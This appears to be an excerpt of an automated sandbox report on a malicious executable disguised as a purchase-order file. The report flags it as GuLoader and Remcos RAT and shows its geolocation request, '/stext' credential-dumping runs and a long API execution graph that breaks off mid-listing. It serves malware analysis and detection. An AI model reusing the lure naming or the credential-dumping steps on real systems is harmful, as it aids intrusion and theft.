                                                            Host: geoplugin.net
                                                            Cache-Control: no-cache
                                                            Dec 16, 2024 15:28:10.656299114 CET1171INHTTP/1.1 200 OK
                                                            date: Mon, 16 Dec 2024 14:28:10 GMT
                                                            server: Apache
                                                            content-length: 963
                                                            content-type: application/json; charset=utf-8
                                                            cache-control: public, max-age=300
                                                            access-control-allow-origin: *
                                                            Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 30 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 [TRUNCATED]
                                                            Data Ascii: { "geoplugin_request":"8.46.123.189", "geoplugin_status":200, "geoplugin_delay":"0ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7503", "geoplugin_longitude":"-74.0014", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                            Click to jump to process

                                                            Click to jump to process

                                                            Click to dive into process behavior distribution

                                                            Click to jump to process

                                                            Target ID:0
                                                            Start time:09:26:23
                                                            Start date:16/12/2024
                                                            Path:C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe"
                                                            Imagebase:0x400000
                                                            File size:778'449 bytes
                                                            MD5 hash:20D75709D275EE9FC5B559E50AE667C3
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2363055993.00000000073C6000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:low
                                                            Has exited:true

                                                            Target ID:5
                                                            Start time:09:27:42
                                                            Start date:16/12/2024
                                                            Path:C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe"
                                                            Imagebase:0x400000
                                                            File size:778'449 bytes
                                                            MD5 hash:20D75709D275EE9FC5B559E50AE667C3
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000005.00000002.2832600827.00000000076B7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000005.00000002.2852514486.000000003788F000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:low
                                                            Has exited:false

                                                            Target ID:8
                                                            Start time:09:28:11
                                                            Start date:16/12/2024
                                                            Path:C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe" /stext "C:\Users\user\AppData\Local\Temp\rhjrpro"
                                                            Imagebase:0x400000
                                                            File size:778'449 bytes
                                                            MD5 hash:20D75709D275EE9FC5B559E50AE667C3
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:low
                                                            Has exited:true

                                                            Target ID:9
                                                            Start time:09:28:11
                                                            Start date:16/12/2024
                                                            Path:C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe" /stext "C:\Users\user\AppData\Local\Temp\cjobhkzbwg"
                                                            Imagebase:0x400000
                                                            File size:778'449 bytes
                                                            MD5 hash:20D75709D275EE9FC5B559E50AE667C3
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:low
                                                            Has exited:true

                                                            Target ID:10
                                                            Start time:09:28:11
                                                            Start date:16/12/2024
                                                            Path:C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe" /stext "C:\Users\user\AppData\Local\Temp\edcuicjcrowul"
                                                            Imagebase:0x400000
                                                            File size:778'449 bytes
                                                            MD5 hash:20D75709D275EE9FC5B559E50AE667C3
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:low
                                                            Has exited:true

                                                            Reset < >

                                                              Execution Graph

                                                              Execution Coverage:20.2%
                                                              Dynamic/Decrypted Code Coverage:14%
                                                              Signature Coverage:21%
                                                              Total number of Nodes:1510
                                                              Total number of Limit Nodes:44
                                                              execution_graph 4970 10001000 4973 1000101b 4970->4973 4980 10001516 4973->4980 4975 10001020 4976 10001024 4975->4976 4977 10001027 GlobalAlloc 4975->4977 4978 1000153d 3 API calls 4976->4978 4977->4976 4979 10001019 4978->4979 4982 1000151c 4980->4982 4981 10001522 4981->4975 4982->4981 4983 1000152e GlobalFree 4982->4983 4983->4975 4984 401d41 GetDC GetDeviceCaps 4985 402b1d 18 API calls 4984->4985 4986 401d5f MulDiv ReleaseDC 4985->4986 4987 402b1d 18 API calls 4986->4987 4988 401d7e 4987->4988 4989 405fae 18 API calls 4988->4989 4990 401db7 CreateFontIndirectW 4989->4990 4991 4024e8 4990->4991 4012 403cc2 4013 403e15 4012->4013 4014 403cda 4012->4014 4016 403e66 4013->4016 4017 403e26 GetDlgItem GetDlgItem 4013->4017 4014->4013 4015 403ce6 4014->4015 4018 403cf1 SetWindowPos 4015->4018 4019 403d04 4015->4019 4021 403ec0 4016->4021 4029 401389 2 API calls 4016->4029 4020 40419a 19 API calls 4017->4020 4018->4019 4023 403d21 4019->4023 4024 403d09 ShowWindow 4019->4024 4025 403e50 SetClassLongW 4020->4025 4042 403e10 4021->4042 4082 4041e6 4021->4082 4026 403d43 4023->4026 4027 403d29 DestroyWindow 4023->4027 4024->4023 4028 40140b 2 API calls 4025->4028 4030 403d48 SetWindowLongW 4026->4030 4031 403d59 4026->4031 4081 404123 4027->4081 4028->4016 4032 403e98 4029->4032 4030->4042 4035 403e02 4031->4035 4036 403d65 GetDlgItem 4031->4036 4032->4021 4037 403e9c SendMessageW 4032->4037 4033 40140b 2 API calls 4052 403ed2 4033->4052 4034 404125 DestroyWindow EndDialog 4034->4081 4101 404201 4035->4101 4040 403d95 4036->4040 4041 403d78 SendMessageW IsWindowEnabled 4036->4041 4037->4042 4039 404154 ShowWindow 4039->4042 4044 403da2 4040->4044 4045 403de9 SendMessageW 4040->4045 4046 403db5 4040->4046 4055 403d9a 4040->4055 4041->4040 4041->4042 4043 405fae 18 API calls 4043->4052 4044->4045 4044->4055 4045->4035 4049 403dd2 4046->4049 4050 403dbd 4046->4050 4048 40419a 19 API calls 4048->4052 4054 40140b 2 API calls 4049->4054 4095 40140b 4050->4095 4051 403dd0 4051->4035 4052->4033 4052->4034 4052->4042 4052->4043 4052->4048 4072 404065 DestroyWindow 4052->4072 4085 40419a 4052->4085 4056 403dd9 4054->4056 4098 404173 4055->4098 4056->4035 4056->4055 4058 403f4d GetDlgItem 4059 403f62 4058->4059 4060 403f6a ShowWindow KiUserCallbackDispatcher 4058->4060 4059->4060 4088 4041bc KiUserCallbackDispatcher 4060->4088 4062 403f94 EnableWindow 4065 403fa8 4062->4065 4063 403fad GetSystemMenu EnableMenuItem SendMessageW 4064 403fdd SendMessageW 4063->4064 4063->4065 4064->4065 4065->4063 4089 4041cf SendMessageW 4065->4089 4090 405f8c lstrcpynW 4065->4090 4068 40400b lstrlenW 4069 405fae 18 API calls 4068->4069 4070 404021 SetWindowTextW 4069->4070 4091 401389 4070->4091 4073 40407f CreateDialogParamW 4072->4073 4072->4081 4074 4040b2 4073->4074 4073->4081 4075 40419a 19 API calls 4074->4075 4076 4040bd GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4075->4076 4077 401389 2 API calls 4076->4077 4078 404103 4077->4078 4078->4042 4079 40410b ShowWindow 4078->4079 4080 4041e6 SendMessageW 4079->4080 4080->4081 4081->4039 4081->4042 4083 4041fe 4082->4083 4084 4041ef SendMessageW 4082->4084 4083->4052 4084->4083 4086 405fae 18 API calls 4085->4086 4087 4041a5 SetDlgItemTextW 4086->4087 4087->4058 4088->4062 4089->4065 4090->4068 4092 401390 4091->4092 4093 4013fe 4092->4093 4094 4013cb MulDiv SendMessageW 4092->4094 4093->4052 4094->4092 4096 401389 2 API calls 4095->4096 4097 401420 4096->4097 4097->4055 4099 404180 SendMessageW 4098->4099 4100 40417a 4098->4100 4099->4051 4100->4099 4102 4042a2 4101->4102 4103 404219 GetWindowLongW 4101->4103 4102->4042 4103->4102 4104 40422a 4103->4104 4105 404239 GetSysColor 4104->4105 4106 40423c 4104->4106 4105->4106 4107 404242 SetTextColor 4106->4107 4108 40424c SetBkMode 4106->4108 4107->4108 4109 404264 GetSysColor 4108->4109 4110 40426a 4108->4110 4109->4110 4111 404271 SetBkColor 4110->4111 4112 40427b 4110->4112 4111->4112 4112->4102 4113 404295 CreateBrushIndirect 4112->4113 4114 40428e DeleteObject 4112->4114 4113->4102 4114->4113 4992 401a42 4993 402b1d 18 API calls 4992->4993 4994 401a48 4993->4994 4995 402b1d 18 API calls 4994->4995 4996 4019f0 4995->4996 5004 402746 5005 402741 5004->5005 5005->5004 5006 402756 FindNextFileW 5005->5006 5007 4027a8 5006->5007 5009 402761 5006->5009 5010 405f8c lstrcpynW 5007->5010 5010->5009 5011 401cc6 5012 402b1d 18 API calls 5011->5012 5013 401cd9 SetWindowLongW 5012->5013 5014 4029c7 5013->5014 5015 401bca 5016 402b1d 18 API calls 5015->5016 5017 401bd1 5016->5017 5018 402b1d 18 API calls 5017->5018 5019 401bdb 5018->5019 5020 401beb 5019->5020 5021 402b3a 18 API calls 5019->5021 5022 401bfb 5020->5022 5023 402b3a 18 API calls 5020->5023 5021->5020 5024 401c06 5022->5024 5025 401c4a 5022->5025 5023->5022 5027 402b1d 18 API calls 5024->5027 5026 402b3a 18 API calls 5025->5026 5028 401c4f 5026->5028 5029 401c0b 5027->5029 5030 402b3a 18 API calls 5028->5030 5031 402b1d 18 API calls 5029->5031 5033 401c58 FindWindowExW 5030->5033 5032 401c14 5031->5032 5034 401c3a SendMessageW 5032->5034 5035 401c1c SendMessageTimeoutW 5032->5035 5036 401c7a 5033->5036 5034->5036 5035->5036 5037 40194b 5038 402b1d 18 API calls 5037->5038 5039 401952 5038->5039 5040 402b1d 18 API calls 5039->5040 5041 40195c 5040->5041 5042 402b3a 18 API calls 5041->5042 5043 401965 5042->5043 5044 401979 lstrlenW 5043->5044 5046 4019b5 5043->5046 5045 401983 5044->5045 5045->5046 5050 405f8c lstrcpynW 5045->5050 5048 40199e 5048->5046 5049 4019ab lstrlenW 5048->5049 5049->5046 5050->5048 5054 4024cc 5055 402b3a 18 API calls 5054->5055 5056 4024d3 5055->5056 5059 405bf8 GetFileAttributesW CreateFileW 5056->5059 5058 4024df 5059->5058 5060 40164d 5061 402b3a 18 API calls 5060->5061 5062 401653 5061->5062 5063 4062cf 2 API calls 5062->5063 5064 401659 5063->5064 5065 4019cf 5066 402b3a 18 API calls 5065->5066 5067 4019d6 5066->5067 5068 402b3a 18 API calls 5067->5068 5069 4019df 5068->5069 5070 4019e6 lstrcmpiW 5069->5070 5071 4019f8 lstrcmpW 5069->5071 5072 4019ec 5070->5072 5071->5072 4279 401e51 4280 402b3a 18 API calls 4279->4280 4281 401e57 4280->4281 4282 405234 25 API calls 4281->4282 4283 401e61 4282->4283 4297 405703 CreateProcessW 4283->4297 4286 401ec6 CloseHandle 4289 402793 4286->4289 4287 401e77 WaitForSingleObject 4288 401e89 4287->4288 4290 401e9b GetExitCodeProcess 4288->4290 4300 40632f 4288->4300 4292 401eba 4290->4292 4293 401ead 4290->4293 4292->4286 4296 401eb8 4292->4296 4304 405ed3 wsprintfW 4293->4304 4296->4286 4298 401e67 4297->4298 4299 405736 CloseHandle 4297->4299 4298->4286 4298->4287 4298->4289 4299->4298 4301 40634c PeekMessageW 4300->4301 4302 406342 DispatchMessageW 4301->4302 4303 401e90 WaitForSingleObject 4301->4303 4302->4301 4303->4288 4304->4296 4379 401752 4380 402b3a 18 API calls 4379->4380 4381 401759 4380->4381 4382 401781 4381->4382 4383 401779 4381->4383 4419 405f8c lstrcpynW 4382->4419 4418 405f8c lstrcpynW 4383->4418 4386 40177f 4390 406220 5 API calls 4386->4390 4387 40178c 4388 4059d7 3 API calls 4387->4388 4389 401792 lstrcatW 4388->4389 4389->4386 4407 40179e 4390->4407 4391 4062cf 2 API calls 4391->4407 4392 405bd3 2 API calls 4392->4407 4394 4017b0 CompareFileTime 4394->4407 4395 401870 4397 405234 25 API calls 4395->4397 4396 401847 4398 405234 25 API calls 4396->4398 4416 40185c 4396->4416 4400 40187a 4397->4400 4398->4416 4399 405f8c lstrcpynW 4399->4407 4401 403062 46 API calls 4400->4401 4402 40188d 4401->4402 4403 4018a1 SetFileTime 4402->4403 4405 4018b3 CloseHandle 4402->4405 4403->4405 4404 405fae 18 API calls 4404->4407 4406 4018c4 4405->4406 4405->4416 4408 4018c9 4406->4408 4409 4018dc 4406->4409 4407->4391 4407->4392 4407->4394 4407->4395 4407->4396 4407->4399 4407->4404 4417 405bf8 GetFileAttributesW CreateFileW 4407->4417 4420 405768 4407->4420 4410 405fae 18 API calls 4408->4410 4411 405fae 18 API calls 4409->4411 4412 4018d1 lstrcatW 4410->4412 4413 4018e4 4411->4413 4412->4413 4415 405768 MessageBoxIndirectW 4413->4415 4415->4416 4417->4407 4418->4386 4419->4387 4421 40577d 4420->4421 4422 4057c9 4421->4422 4423 405791 MessageBoxIndirectW 4421->4423 4422->4407 4423->4422 4424 402253 4425 402261 4424->4425 4426 40225b 4424->4426 4428 402b3a 18 API calls 4425->4428 4429 40226f 4425->4429 4427 402b3a 18 API calls 4426->4427 4427->4425 4428->4429 4430 40227d 4429->4430 4432 402b3a 18 API calls 4429->4432 4431 402b3a 18 API calls 4430->4431 4433 402286 WritePrivateProfileStringW 4431->4433 4432->4430 5073 402454 5074 402c44 19 API calls 5073->5074 5075 40245e 5074->5075 5076 402b1d 18 API calls 5075->5076 5077 402467 5076->5077 5078 40248b RegEnumValueW 5077->5078 5079 40247f RegEnumKeyW 5077->5079 5080 402793 5077->5080 5078->5080 5081 4024a4 RegCloseKey 5078->5081 5079->5081 5081->5080 5083 401ed4 5084 402b3a 18 API calls 5083->5084 5085 401edb 5084->5085 5086 4062cf 2 API calls 5085->5086 5087 401ee1 5086->5087 5089 401ef2 5087->5089 5090 405ed3 wsprintfW 5087->5090 5090->5089 4503 4022d5 4504 402305 4503->4504 4505 4022da 4503->4505 4506 402b3a 18 API calls 4504->4506 4507 402c44 19 API calls 4505->4507 4508 40230c 4506->4508 4509 4022e1 4507->4509 4515 402b7a RegOpenKeyExW 4508->4515 4510 4022eb 4509->4510 4514 402322 4509->4514 4511 402b3a 18 API calls 4510->4511 4513 4022f2 RegDeleteValueW RegCloseKey 4511->4513 4513->4514 4516 402c0e 4515->4516 4518 402ba5 4515->4518 4516->4514 4517 402bcb RegEnumKeyW 4517->4518 4519 402bdd RegCloseKey 4517->4519 4518->4517 4518->4519 4521 402c02 RegCloseKey 4518->4521 4524 402b7a 3 API calls 4518->4524 4520 4062f6 3 API calls 4519->4520 4522 402bed 4520->4522 4523 402bf1 4521->4523 4522->4523 4525 402c1d RegDeleteKeyW 4522->4525 4523->4516 4524->4518 4525->4523 4533 4014d7 4534 402b1d 18 API calls 4533->4534 4535 4014dd Sleep 4534->4535 4537 4029c7 4535->4537 4752 40335a #17 SetErrorMode OleInitialize 4753 4062f6 3 API calls 4752->4753 4754 40339d SHGetFileInfoW 4753->4754 4827 405f8c lstrcpynW 4754->4827 4756 4033c8 GetCommandLineW 4828 405f8c lstrcpynW 4756->4828 4758 4033da GetModuleHandleW 4759 4033f4 4758->4759 4760 405a04 CharNextW 4759->4760 4761 403402 CharNextW 4760->4761 4769 403414 4761->4769 4762 403516 4763 40352a GetTempPathW 4762->4763 4829 403326 4763->4829 4765 403542 4766 403546 GetWindowsDirectoryW lstrcatW 4765->4766 4767 40359c DeleteFileW 4765->4767 4770 403326 11 API calls 4766->4770 4837 402dbc GetTickCount GetModuleFileNameW 4767->4837 4768 405a04 CharNextW 4768->4769 4769->4762 4769->4768 4775 403518 4769->4775 4772 403562 4770->4772 4772->4767 4774 403566 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4772->4774 4773 4035b0 4776 403663 4773->4776 4779 403653 4773->4779 4783 405a04 CharNextW 4773->4783 4778 403326 11 API calls 4774->4778 4921 405f8c lstrcpynW 4775->4921 4924 40382d 4776->4924 4782 403594 4778->4782 4867 40391f 4779->4867 4782->4767 4782->4776 4795 4035cf 4783->4795 4785 403772 4788 403815 ExitProcess 4785->4788 4793 4062f6 3 API calls 4785->4793 4786 40367c 4787 405768 MessageBoxIndirectW 4786->4787 4789 40368a ExitProcess 4787->4789 4790 403692 lstrcatW lstrcmpiW 4790->4776 4797 4036ae CreateDirectoryW SetCurrentDirectoryW 4790->4797 4791 40362d 4796 405adf 18 API calls 4791->4796 4794 403785 4793->4794 4798 4062f6 3 API calls 4794->4798 4795->4790 4795->4791 4799 403639 4796->4799 4800 4036d1 4797->4800 4801 4036c6 4797->4801 4802 40378e 4798->4802 4799->4776 4922 405f8c lstrcpynW 4799->4922 4934 405f8c lstrcpynW 4800->4934 4933 405f8c lstrcpynW 4801->4933 4805 4062f6 3 API calls 4802->4805 4807 403797 4805->4807 4809 4037b5 4807->4809 4816 4037a5 GetCurrentProcess 4807->4816 4808 403648 4923 405f8c lstrcpynW 4808->4923 4812 4062f6 3 API calls 4809->4812 4811 405fae 18 API calls 4813 403710 DeleteFileW 4811->4813 4814 4037ec 4812->4814 4815 40371d CopyFileW 4813->4815 4824 4036df 4813->4824 4817 403801 ExitWindowsEx 4814->4817 4820 40380e 4814->4820 4815->4824 4816->4809 4817->4788 4817->4820 4818 403766 4821 405e26 40 API calls 4818->4821 4819 405e26 40 API calls 4819->4824 4822 40140b 2 API calls 4820->4822 4821->4776 4822->4788 4823 405fae 18 API calls 4823->4824 4824->4811 4824->4818 4824->4819 4824->4823 4825 405703 2 API calls 4824->4825 4826 403751 CloseHandle 4824->4826 4825->4824 4826->4824 4827->4756 4828->4758 4830 406220 5 API calls 4829->4830 4831 403332 4830->4831 4832 40333c 4831->4832 4833 4059d7 3 API calls 4831->4833 4832->4765 4834 403344 CreateDirectoryW 4833->4834 4935 405c27 4834->4935 4939 405bf8 GetFileAttributesW CreateFileW 4837->4939 4839 402dff 4866 402e0c 4839->4866 4940 405f8c lstrcpynW 4839->4940 4841 402e22 4842 405a23 2 API calls 4841->4842 4843 402e28 4842->4843 4941 405f8c lstrcpynW 4843->4941 4845 402e33 GetFileSize 4846 402f34 4845->4846 4864 402e4a 4845->4864 4847 402d1a 33 API calls 4846->4847 4848 402f3b 4847->4848 4850 402f77 GlobalAlloc 4848->4850 4848->4866 4943 40330f SetFilePointer 4848->4943 4849 4032f9 ReadFile 4849->4864 4852 402f8e 4850->4852 4851 402fcf 4853 402d1a 33 API calls 4851->4853 4856 405c27 2 API calls 4852->4856 4853->4866 4855 402f58 4857 4032f9 ReadFile 4855->4857 4859 402f9f CreateFileW 4856->4859 4860 402f63 4857->4860 4858 402d1a 33 API calls 4858->4864 4861 402fd9 4859->4861 4859->4866 4860->4850 4860->4866 4942 40330f SetFilePointer 4861->4942 4863 402fe7 4865 403062 46 API calls 4863->4865 4864->4846 4864->4849 4864->4851 4864->4858 4864->4866 4865->4866 4866->4773 4868 4062f6 3 API calls 4867->4868 4869 403933 4868->4869 4870 403939 4869->4870 4871 40394b 4869->4871 4953 405ed3 wsprintfW 4870->4953 4872 405e59 3 API calls 4871->4872 4873 40397b 4872->4873 4875 40399a lstrcatW 4873->4875 4877 405e59 3 API calls 4873->4877 4876 403949 4875->4876 4944 403bf5 4876->4944 4877->4875 4880 405adf 18 API calls 4881 4039cc 4880->4881 4882 403a60 4881->4882 4884 405e59 3 API calls 4881->4884 4883 405adf 18 API calls 4882->4883 4885 403a66 4883->4885 4886 4039fe 4884->4886 4887 403a76 LoadImageW 4885->4887 4888 405fae 18 API calls 4885->4888 4886->4882 4891 403a1f lstrlenW 4886->4891 4894 405a04 CharNextW 4886->4894 4889 403b1c 4887->4889 4890 403a9d RegisterClassW 4887->4890 4888->4887 4893 40140b 2 API calls 4889->4893 4892 403ad3 SystemParametersInfoW CreateWindowExW 4890->4892 4920 403b26 4890->4920 4895 403a53 4891->4895 4896 403a2d lstrcmpiW 4891->4896 4892->4889 4897 403b22 4893->4897 4899 403a1c 4894->4899 4898 4059d7 3 API calls 4895->4898 4896->4895 4900 403a3d GetFileAttributesW 4896->4900 4901 403bf5 19 API calls 4897->4901 4897->4920 4902 403a59 4898->4902 4899->4891 4903 403a49 4900->4903 4904 403b33 4901->4904 4954 405f8c lstrcpynW 4902->4954 4903->4895 4906 405a23 2 API calls 4903->4906 4907 403bc2 4904->4907 4908 403b3f ShowWindow LoadLibraryW 4904->4908 4906->4895 4911 405307 5 API calls 4907->4911 4909 403b65 GetClassInfoW 4908->4909 4910 403b5e LoadLibraryW 4908->4910 4912 403b79 GetClassInfoW RegisterClassW 4909->4912 4913 403b8f DialogBoxParamW 4909->4913 4910->4909 4914 403bc8 4911->4914 4912->4913 4915 40140b 2 API calls 4913->4915 4916 403be4 4914->4916 4917 403bcc 4914->4917 4915->4920 4918 40140b 2 API calls 4916->4918 4919 40140b 2 API calls 4917->4919 4917->4920 4918->4920 4919->4920 4920->4776 4921->4763 4922->4808 4923->4779 4925 403848 4924->4925 4926 40383e CloseHandle 4924->4926 4927 403852 CloseHandle 4925->4927 4928 40385c 4925->4928 4926->4925 4927->4928 4956 40388a 4928->4956 4931 405814 71 API calls 4932 40366c OleUninitialize 4931->4932 4932->4785 4932->4786 4933->4800 4934->4824 4936 405c34 GetTickCount GetTempFileNameW 4935->4936 4937 403358 4936->4937 4938 405c6a 4936->4938 4937->4765 4938->4936 4938->4937 4939->4839 4940->4841 4941->4845 4942->4863 4943->4855 4945 403c09 4944->4945 4955 405ed3 wsprintfW 4945->4955 4947 403c7a 4948 405fae 18 API calls 4947->4948 4949 403c86 SetWindowTextW 4948->4949 4950 4039aa 4949->4950 4951 403ca2 4949->4951 4950->4880 4951->4950 4952 405fae 18 API calls 4951->4952 4952->4951 4953->4876 4954->4882 4955->4947 4957 403898 4956->4957 4958 40389d FreeLibrary GlobalFree 4957->4958 4959 403861 4957->4959 4958->4958 4958->4959 4959->4931 5098 40155b 5099 40296d 5098->5099 5102 405ed3 wsprintfW 5099->5102 5101 402972 5102->5101 5103 4038dd 5104 4038e8 5103->5104 5105 4038ec 5104->5105 5106 4038ef GlobalAlloc 5104->5106 5106->5105 5107 40165e 5108 402b3a 18 API calls 5107->5108 5109 401665 5108->5109 5110 402b3a 18 API calls 5109->5110 5111 40166e 5110->5111 5112 402b3a 18 API calls 5111->5112 5113 401677 MoveFileW 5112->5113 5114 401683 5113->5114 5115 40168a 5113->5115 5116 401423 25 API calls 5114->5116 5117 4062cf 2 API calls 5115->5117 5119 402197 5115->5119 5116->5119 5118 401699 5117->5118 5118->5119 5120 405e26 40 API calls 5118->5120 5120->5114 3951 4023e0 3962 402c44 3951->3962 3953 4023ea 3966 402b3a 3953->3966 3956 402793 3957 4023fe RegQueryValueExW 3958 40241e 3957->3958 3959 402424 RegCloseKey 3957->3959 3958->3959 3972 405ed3 wsprintfW 3958->3972 3959->3956 3963 402b3a 18 API calls 3962->3963 3964 402c5d 3963->3964 3965 402c6b RegOpenKeyExW 3964->3965 3965->3953 3967 402b46 3966->3967 3973 405fae 3967->3973 3970 4023f3 3970->3956 3970->3957 3972->3959 3989 405fbb 3973->3989 3974 406206 3975 402b67 3974->3975 4007 405f8c lstrcpynW 3974->4007 3975->3970 3991 406220 3975->3991 3977 40606e GetVersion 3977->3989 3978 4061d4 lstrlenW 3978->3989 3979 405fae 10 API calls 3979->3978 3982 4060e9 GetSystemDirectoryW 3982->3989 3984 4060fc GetWindowsDirectoryW 3984->3989 3985 406220 5 API calls 3985->3989 3986 405fae 10 API calls 3986->3989 3987 406175 lstrcatW 3987->3989 3988 406130 SHGetSpecialFolderLocation 3988->3989 3990 406148 SHGetPathFromIDListW CoTaskMemFree 3988->3990 3989->3974 3989->3977 3989->3978 3989->3979 3989->3982 3989->3984 3989->3985 3989->3986 3989->3987 3989->3988 4000 405e59 RegOpenKeyExW 3989->4000 4005 405ed3 wsprintfW 3989->4005 4006 405f8c lstrcpynW 3989->4006 3990->3989 3998 40622d 3991->3998 3992 4062a3 3993 4062a8 CharPrevW 3992->3993 3996 4062c9 3992->3996 3993->3992 3994 406296 CharNextW 3994->3992 3994->3998 3996->3970 3997 406282 CharNextW 3997->3998 3998->3992 3998->3994 3998->3997 3999 406291 CharNextW 3998->3999 4008 405a04 3998->4008 3999->3994 4001 405ecd 4000->4001 4002 405e8d RegQueryValueExW 4000->4002 4001->3989 4003 405eae RegCloseKey 4002->4003 4003->4001 4005->3989 4006->3989 4007->3975 4009 405a0a 4008->4009 4010 405a20 4009->4010 4011 405a11 CharNextW 4009->4011 4010->3998 4011->4009 5121 4065e1 5123 406465 5121->5123 5122 406dd0 5123->5122 5124 4064e6 GlobalFree 5123->5124 5125 4064ef GlobalAlloc 5123->5125 5126 406566 GlobalAlloc 5123->5126 5127 40655d GlobalFree 5123->5127 5124->5125 5125->5122 5125->5123 5126->5122 5126->5123 5127->5126 5128 401ce5 GetDlgItem GetClientRect 5129 402b3a 18 API calls 5128->5129 5130 401d17 LoadImageW SendMessageW 5129->5130 5131 401d35 DeleteObject 5130->5131 5132 4029c7 5130->5132 5131->5132 5133 4042e8 lstrlenW 5134 404307 5133->5134 5135 404309 WideCharToMultiByte 5133->5135 5134->5135 5136 401de8 EnableWindow 5137 4029c7 5136->5137 5138 100018a9 5140 100018cc 5138->5140 5139 10001911 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 5142 10001272 2 API calls 5139->5142 5140->5139 5141 100018ff GlobalFree 5140->5141 5141->5139 5143 10001a87 GlobalFree GlobalFree 5142->5143 5144 40206a 5145 402b3a 18 API calls 5144->5145 5146 402071 5145->5146 5147 402b3a 18 API calls 5146->5147 5148 40207b 5147->5148 5149 402b3a 18 API calls 5148->5149 5150 402084 5149->5150 5151 402b3a 18 API calls 5150->5151 5152 40208e 5151->5152 5153 402b3a 18 API calls 5152->5153 5154 402098 5153->5154 5155 4020ac CoCreateInstance 5154->5155 5156 402b3a 18 API calls 5154->5156 5157 4020cb 5155->5157 5156->5155 5158 401423 25 API calls 5157->5158 5159 402197 5157->5159 5158->5159 4258 40156b 4259 401584 4258->4259 4260 40157b ShowWindow 4258->4260 4261 401592 ShowWindow 4259->4261 4262 4029c7 4259->4262 4260->4259 4261->4262 4263 4024ee 4264 4024f3 4263->4264 4265 40250c 4263->4265 4276 402b1d 4264->4276 4267 402512 4265->4267 4268 40253e 4265->4268 4270 402b3a 18 API calls 4267->4270 4271 402b3a 18 API calls 4268->4271 4269 4024fa 4274 402793 4269->4274 4275 402567 WriteFile 4269->4275 4272 402519 WideCharToMultiByte lstrlenA 4270->4272 4273 402545 lstrlenW 4271->4273 4272->4269 4273->4269 4275->4274 4277 405fae 18 API 